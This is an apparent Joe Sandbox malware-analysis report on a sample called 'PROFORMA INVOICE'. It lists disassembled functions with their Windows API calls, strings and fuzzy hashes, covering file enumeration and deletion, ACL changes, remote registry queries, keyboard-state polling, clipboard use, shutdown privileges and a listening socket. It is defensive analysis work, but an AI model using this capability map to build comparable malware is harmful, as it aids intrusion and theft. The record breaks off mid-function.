Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 28b75c8f414e5efed65850925db9da41c1239cef2bc364e8842db939b913828f
Instruction ID: 756ef2b7315ab3b54a7cfaac208194011f93625274516f5d15cf60db8b525a96
Opcode Fuzzy Hash: 28b75c8f414e5efed65850925db9da41c1239cef2bc364e8842db939b913828f
Instruction Fuzzy Hash: 15A10DB2408344ABC350EBA4CC85DAFB7ECFF98704F44492EF59586151EB38D949E7A2

Function 00FB1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FB1B50
_wcscmp.LIBCMT ref: 00FB1B65
_wcscmp.LIBCMT ref: 00FB1B7C
GetFileAttributesW.KERNEL32(?), ref: 00FB1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00FB1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00FB1BC0
FindClose.KERNEL32(00000000), ref: 00FB1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00FB1BE7
_wcscmp.LIBCMT ref: 00FB1C0E
_wcscmp.LIBCMT ref: 00FB1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB1C37
SetCurrentDirectoryW.KERNEL32(010139FC), ref: 00FB1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FB1C5F
FindClose.KERNEL32(00000000), ref: 00FB1C6C
FindClose.KERNEL32(00000000), ref: 00FB1C7C

Strings

*.*, xrefs: 00FB1BE2

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: c59f26c78cda8d32ad0f908e0d70d0b7a633baf6ee4e65ea48405492b11b7ce8
Instruction ID: 120dca93da3132031013f5cf10cabd56849a405d033b9da5d2c1210e7415d688
Opcode Fuzzy Hash: c59f26c78cda8d32ad0f908e0d70d0b7a633baf6ee4e65ea48405492b11b7ce8
Instruction Fuzzy Hash: 7331F57290021D6FDF20AFA1DC59ADE7BACBF45320F504165E901E7090EB34DA85AE64

Function 00FB1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FB1CAB
_wcscmp.LIBCMT ref: 00FB1CC0
_wcscmp.LIBCMT ref: 00FB1CD7

Part of subcall function 00FA6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00FA6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00FB1D06
FindClose.KERNEL32(00000000), ref: 00FB1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00FB1D2D
_wcscmp.LIBCMT ref: 00FB1D54
_wcscmp.LIBCMT ref: 00FB1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB1D7D
SetCurrentDirectoryW.KERNEL32(010139FC), ref: 00FB1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FB1DA5
FindClose.KERNEL32(00000000), ref: 00FB1DB2
FindClose.KERNEL32(00000000), ref: 00FB1DC2

Strings

*.*, xrefs: 00FB1D28

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: ee0d93e9c5d004dfbc0d5b047cc119b23a8b161b5aaece3327af5dfca85d362f
Instruction ID: 3f9808a78d621abe11a88f9a6dfe4e306e11e365e0b10160f0e2654bf6e800ab
Opcode Fuzzy Hash: ee0d93e9c5d004dfbc0d5b047cc119b23a8b161b5aaece3327af5dfca85d362f
Instruction Fuzzy Hash: 9B31063290061E6EDF20ABA1DC59AEE77ADBF49330F540565E801EB090DB34DA85EF64

Function 00F67D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F67DBD

Strings

\b(?<=\w), xrefs: 00FDF877
Q\E, xrefs: 00F686D6
[, xrefs: 00F67E14
^, xrefs: 00F67D96
\, xrefs: 00F67E1D
\b(?=\w), xrefs: 00FDF85E
\, xrefs: 00F67D89
\, xrefs: 00FDF95B
[:<:]], xrefs: 00F67D1D
[:>:]], xrefs: 00F67D37
], xrefs: 00F67D9F

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: d5f092801c965d16e496294cf6c007890e937b46ef6353afb13295fb024b03a7
Instruction ID: 07b3f98e63f3e143754231a477dc089338ff32ea98b1f780a85584a1adb150dc
Opcode Fuzzy Hash: d5f092801c965d16e496294cf6c007890e937b46ef6353afb13295fb024b03a7
Instruction Fuzzy Hash: 7582C672D04219CBCF24DF94C8807ADB7B2FF44324F29816AD85AAB351E7749D85EB90

Function 00FB091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00FB09DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FB09EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FB09FB
__wsplitpath.LIBCMT ref: 00FB0A59
_wcscat.LIBCMT ref: 00FB0A71
_wcscat.LIBCMT ref: 00FB0A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB0A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB0AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB0ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB0AFF
_wcscpy.LIBCMT ref: 00FB0B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00FB0B4A

Strings

*.*, xrefs: 00FB0B05

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 5de9e6ab7160d9470649a600af1e0c2cbb704ffd8a7046b02bd6ca74bccd5c18
Instruction ID: 544e9f89e220c32ddfeb6b452883b340db0135a8a96dc8b91dbae079373bb864
Opcode Fuzzy Hash: 5de9e6ab7160d9470649a600af1e0c2cbb704ffd8a7046b02bd6ca74bccd5c18
Instruction Fuzzy Hash: FC6157725043059FD710EF61C8819AFB3E8FF89320F04891AE989C7251DB35E949DF92

Function 00F9A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F9ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00F9ABD7
Part of subcall function 00F9ABBB: GetLastError.KERNEL32(?,00F9A69F,?,?,?), ref: 00F9ABE1
Part of subcall function 00F9ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00F9A69F,?,?,?), ref: 00F9ABF0
Part of subcall function 00F9ABBB: HeapAlloc.KERNEL32(00000000,?,00F9A69F,?,?,?), ref: 00F9ABF7
Part of subcall function 00F9ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00F9AC0E

Part of subcall function 00F9AC56: GetProcessHeap.KERNEL32(00000008,00F9A6B5,00000000,00000000,?,00F9A6B5,?), ref: 00F9AC62
Part of subcall function 00F9AC56: HeapAlloc.KERNEL32(00000000,?,00F9A6B5,?), ref: 00F9AC69
Part of subcall function 00F9AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00F9A6B5,?), ref: 00F9AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F9A6D0
_memset.LIBCMT ref: 00F9A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F9A704
GetLengthSid.ADVAPI32(?), ref: 00F9A715
GetAce.ADVAPI32(?,00000000,?), ref: 00F9A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F9A76E
GetLengthSid.ADVAPI32(?), ref: 00F9A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00F9A79A
HeapAlloc.KERNEL32(00000000), ref: 00F9A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F9A7C2
CopySid.ADVAPI32(00000000), ref: 00F9A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F9A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F9A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F9A834

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 15f1af4375cdc04caf387f679511db65933a94f499b5ed0a1474fa68418e4f50
Instruction ID: a4e70dd52857f481a42a50b0dd3119897562b4a3532fd5580f559da74a9623fa
Opcode Fuzzy Hash: 15f1af4375cdc04caf387f679511db65933a94f499b5ed0a1474fa68418e4f50
Instruction Fuzzy Hash: 20514D71900249AFEF10DF95DC85AEEBBB9FF44310F048129F911AB290DB35DA05EBA1

Function 00F66F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

LF), xrefs: 00FE2E26
UCP), xrefs: 00FE2C8F
LIMIT_MATCH=, xrefs: 00FE2CF2
UTF16), xrefs: 00FE2C56
NO_START_OPT), xrefs: 00FE2CD1
ANYCRLF), xrefs: 00FE2E7D
LIMIT_RECURSION=, xrefs: 00FE2D7E
, xrefs: 00F66F77
BSR_ANYCRLF), xrefs: 00FE2EA0
NO_AUTO_POSSESS), xrefs: 00FE2CB0
UTF), xrefs: 00FE2C7C
ANY), xrefs: 00FE2E60
CRLF), xrefs: 00FE2E43
CR), xrefs: 00FE2E09
BSR_UNICODE), xrefs: 00FE2EBA
mmmmmm, xrefs: 00FE2ECB

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID:
String ID: $ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$mmmmmm
API String ID: 0-867502260
Opcode ID: 8b9449e20595f5d02b22f36741b0e8e77b1d6785fa83f960d67754324c732b26
Instruction ID: 4710f450ea482b59aadc89811a548e721b0e44a10fa7ef18f39b68496130cdc6
Opcode Fuzzy Hash: 8b9449e20595f5d02b22f36741b0e8e77b1d6785fa83f960d67754324c732b26
Instruction Fuzzy Hash: 3B729071E04359CBDF24DF59C8847AEB7B5BF48324F14816AE845EB280EB749E41EB90

Function 00FA63F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FA5FA6,?), ref: 00FA6ED8

Part of subcall function 00FA72CB: GetFileAttributesW.KERNEL32(?,00FA6019), ref: 00FA72CC

_wcscat.LIBCMT ref: 00FA6441
__wsplitpath.LIBCMT ref: 00FA645F
FindFirstFileW.KERNEL32(?,?), ref: 00FA6474
_wcscpy.LIBCMT ref: 00FA64A3
_wcscat.LIBCMT ref: 00FA64B8
_wcscat.LIBCMT ref: 00FA64CA
DeleteFileW.KERNEL32(?), ref: 00FA64DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FA64EB
FindClose.KERNEL32(00000000), ref: 00FA6506

Strings

\*.*, xrefs: 00FA643B

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 67d3b5dedfb17a3141220ca8396f8f612481f5c1796317610bcf37ad180a7b11
Instruction ID: 06bc6be8092e10287de8f17c948d9d6e1fa94c364595842b9f4a96f45147939e
Opcode Fuzzy Hash: 67d3b5dedfb17a3141220ca8396f8f612481f5c1796317610bcf37ad180a7b11
Instruction Fuzzy Hash: 973164F28083889EC721EBA48C85ADB77DCAF56310F44492EF6D9C3141EA39D50DA767

Function 00FC31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FC2BB5,?,?), ref: 00FC3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FC328E

Part of subcall function 00F6936C: __swprintf.LIBCMT ref: 00F693AB
Part of subcall function 00F6936C: __itow.LIBCMT ref: 00F693DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FC332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00FC33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00FC3604
RegCloseKey.ADVAPI32(00000000), ref: 00FC3611

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: ca7b9cbb70edb16ec63d9c5478db9edf06d50f88d0eab15ff18766378bb8214a
Instruction ID: 302a845f25ee8f77cc9edadeae5f44718e8cf62dc2c251c2fe2c8e1c5d591996
Opcode Fuzzy Hash: ca7b9cbb70edb16ec63d9c5478db9edf06d50f88d0eab15ff18766378bb8214a
Instruction Fuzzy Hash: 98E15F71604211AFCB14DF28C992E2ABBE8EF89364F04C85DF54ADB251DB34ED05DB52

Function 00FA2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FA2B5F
GetAsyncKeyState.USER32(000000A0), ref: 00FA2BE0
GetKeyState.USER32(000000A0), ref: 00FA2BFB
GetAsyncKeyState.USER32(000000A1), ref: 00FA2C15
GetKeyState.USER32(000000A1), ref: 00FA2C2A
GetAsyncKeyState.USER32(00000011), ref: 00FA2C42
GetKeyState.USER32(00000011), ref: 00FA2C54
GetAsyncKeyState.USER32(00000012), ref: 00FA2C6C
GetKeyState.USER32(00000012), ref: 00FA2C7E
GetAsyncKeyState.USER32(0000005B), ref: 00FA2C96
GetKeyState.USER32(0000005B), ref: 00FA2CA8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b3019e8ad7b9ae4c4b91cb73c4ab21d5f0da26540f5783310581eb58e8514a64
Instruction ID: fb0f172e858af8cad1fcad67320bf295f4e178ca16e22d20a095b4d3c4d3bea9
Opcode Fuzzy Hash: b3019e8ad7b9ae4c4b91cb73c4ab21d5f0da26540f5783310581eb58e8514a64
Instruction Fuzzy Hash: 44412CB4F047C96EFFB55B68C8443ADBEA06F53374F084049D9C24A6C1DB9499C4E7A1

Function 00FB6D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00FB6D2E
EmptyClipboard.USER32 ref: 00FB6D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00FB6D49
CloseClipboard.USER32 ref: 00FB6DE8

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 026bbf4c9d64acffdb8dcf29bfbfd591b3f2ddb518b8f953fc2bc3d75b27413f
Instruction ID: 70131cbaae4ca59085efd77120c5197c7ff00e8d5d90929a3a3aa2b7b80cb2e0
Opcode Fuzzy Hash: 026bbf4c9d64acffdb8dcf29bfbfd591b3f2ddb518b8f953fc2bc3d75b27413f
Instruction Fuzzy Hash: 0621B2317001149FDB11AF65DC89B6D77A8FF08720F04841AF90ADB2A1CB79EC01AF95

Function 00FBC18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00F99ABF: CLSIDFromProgID.OLE32 ref: 00F99ADC
Part of subcall function 00F99ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00F99AF7
Part of subcall function 00F99ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00F99B05
Part of subcall function 00F99ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00F99B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00FBC235
_memset.LIBCMT ref: 00FBC242
_memset.LIBCMT ref: 00FBC360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00FBC38C
CoTaskMemFree.OLE32(?), ref: 00FBC397

Strings

NULL Pointer assignment, xrefs: 00FBC3E5

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 8108fe21cfbd280fcea2bebec3f1c92b36c5bcb678b7bc97301f11929f9769cf
Instruction ID: a36e4daa8a141993848d1e097c8b0e5bd19f7a0930c2c299026a2adc9a96bbb8
Opcode Fuzzy Hash: 8108fe21cfbd280fcea2bebec3f1c92b36c5bcb678b7bc97301f11929f9769cf
Instruction Fuzzy Hash: 21914B71D00218EBDB10DF95DC91EEEBBB8EF48710F10812AF519A7291DB749A45DFA0

Function 00FA79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00F9B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F9B180
Part of subcall function 00F9B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F9B1AD
Part of subcall function 00F9B134: GetLastError.KERNEL32 ref: 00F9B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00FA7A0F

Strings

SeShutdownPrivilege, xrefs: 00FA79DD
@, xrefs: 00FA7A02
, xrefs: 00FA79FD

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 54fabc98753fc4ecf1e9f4bf51ab42a4c8e3ee559b715b88117b59e16b4bdb12
Instruction ID: 00b0f88d150ab75fcb743e13910cbc59031a4aaa0c3a4e84c017c7a10ad6f939
Opcode Fuzzy Hash: 54fabc98753fc4ecf1e9f4bf51ab42a4c8e3ee559b715b88117b59e16b4bdb12
Instruction Fuzzy Hash: E601F7F6B583557EFB2837689C8AFBF33589B02750F140424BD53E60E2D5685E00B1B0

Function 00FB8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00FB8CA8
WSAGetLastError.WSOCK32(00000000), ref: 00FB8CB7
bind.WSOCK32(00000000,?,00000010), ref: 00FB8CD3
listen.WSOCK32(00000000,00000005), ref: 00FB8CE2
WSAGetLastError.WSOCK32(00000000), ref: 00FB8CFC
closesocket.WSOCK32(00000000,00000000), ref: 00FB8D10

Memory Dump Source

Source File: 00000000.00000002.1704834520.0000000000F61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000000.00000002.1704820155.0000000000F60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.0000000000FED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704892696.000000000100E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704937022.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704956677.0000000001024000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f60000_PROFORMA INVOICE.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 3677b9c3f36360dc2d5950133722a808283dd3615a049c964f729f32cdb37141
Instruction ID: 1a7c79dd251d8738a3d7234b887ad700b22330576463fc2107a4b84c5c822ad7
Opcode Fuzzy Hash: 3677b9c3f36360dc2d5950133722a808283dd3615a049c964f729f32cdb37141
Instruction Fuzzy Hash: C421F6716002049FCB10EF24CD85BAEB7E9EF89360F108159F916AB3D2CB34AD42EB51

Function 00FA6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00FA6554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00FA6564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00FA6583
